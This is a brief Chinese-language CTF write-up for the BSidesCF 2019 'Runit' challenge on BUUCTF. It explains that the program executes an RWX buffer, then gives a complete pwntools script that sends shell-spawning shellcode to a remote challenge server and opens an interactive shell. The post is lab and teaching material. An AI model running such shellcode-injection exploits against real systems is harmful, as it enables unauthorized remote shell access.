BSidesCF2019-Runit

Created2023-06-11|Updated2023-06-11|CTFBUUCTF

|Post View:

Runit(vmmap的特性)

检查保护

只是开了NX

IDA静态分析

这里有个小知识点就是buf是由vmmap映射的，所以可读可写可执行

第15行去执行buf，那么我们直接写进shellcode就可以了

exp：

from pwn import *

context.log_level = "debug"
context.arch="i386"
io = remote("node4.buuoj.cn",25524)
#io = process('./runit')


shellcode = asm(shellcraft.sh())
io.sendline(shellcode)

io.interactive()

Author: s4ndw1ch

Link: http://s4ndw1ch136.github.io/post/a942ef61.html

BUUCTF PWN

2023-05-11

BUUCTF-ciscn_2019_es_7

2023-05-08

BUUCTF-pwnable_hacknote

2023-06-06

HITCON_2018_children_tcache

2023-11-01

asis2016_b00ks(根据报错信息确定mmap拓展偏移)